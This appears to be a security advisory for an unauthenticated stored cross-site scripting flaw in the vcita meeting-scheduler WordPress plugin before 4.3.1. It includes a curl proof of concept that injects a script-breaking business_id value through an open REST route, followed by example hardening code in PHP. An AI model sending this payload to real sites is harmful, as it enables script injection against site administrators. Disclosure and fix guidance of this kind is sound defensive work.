The plugin does not sanitize and escape the business_id parameter of an unprotected REST route endpoint before rendering it back in pages on the website, allowing an unauthenticated attacker to inject arbitrary web scripts, which could target authenticated users such as administrators.
```
curl https://example.com/wp-json/vcita-wordpress/v1/actions/auth \
  --json '{ "success": true, "user_data": { "business_id": "\"; alert(1); //", "business_name": "Evil Eve", "email": "[email protected]" } }'
```
CPE

Name | Operator | Version |
---|---|---|
meeting-scheduler-by-vcita | lt | 4.3.1 |
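The three controls the description says are missing (a protected route, input sanitization, output escaping) can be sketched as follows. This is an added example, not the plugin's code or its actual fix. The route namespace `example-plugin/v1`, the option name `example_business_id`, the function name, the ID format, the administrator-only access model and the inline-script rendering context are all assumptions.

```php
<?php
// Added example: hypothetical plugin code, not taken from the vcita plugin.
// Route namespace, option name, ID format and access model are assumptions.

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-plugin/v1', '/actions/auth', array(
        'methods'             => 'POST',
        // An explicit capability check replaces an open route
        // (the weak form would be '__return_true').
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'callback'            => 'example_store_business_id',
    ) );
} );

function example_store_business_id( WP_REST_Request $request ) {
    $user_data   = (array) $request->get_param( 'user_data' );
    $business_id = isset( $user_data['business_id'] ) ? $user_data['business_id'] : '';

    // Input validation: accept only the assumed ID alphabet, reject the rest.
    if ( ! is_string( $business_id )
        || ! preg_match( '/\A[A-Za-z0-9_-]{1,64}\z/', $business_id ) ) {
        return new WP_Error(
            'invalid_business_id',
            'Invalid business_id',
            array( 'status' => 400 )
        );
    }

    update_option( 'example_business_id', $business_id );
    return rest_ensure_response( array( 'success' => true ) );
}

// Output escaping: encode for the JavaScript context at render time,
// even though the value was validated when it was stored.
add_action( 'wp_footer', function () {
    $business_id = get_option( 'example_business_id', '' );
    // Weak form: echo '<script>var businessId = "' . $business_id . '";</script>';
    printf(
        '<script>var businessId = %s;</script>',
        wp_json_encode(
            (string) $business_id,
            JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        )
    );
} );
```

Escaping at output matters independently of the input check, because values stored before a fix was deployed may still be in the database.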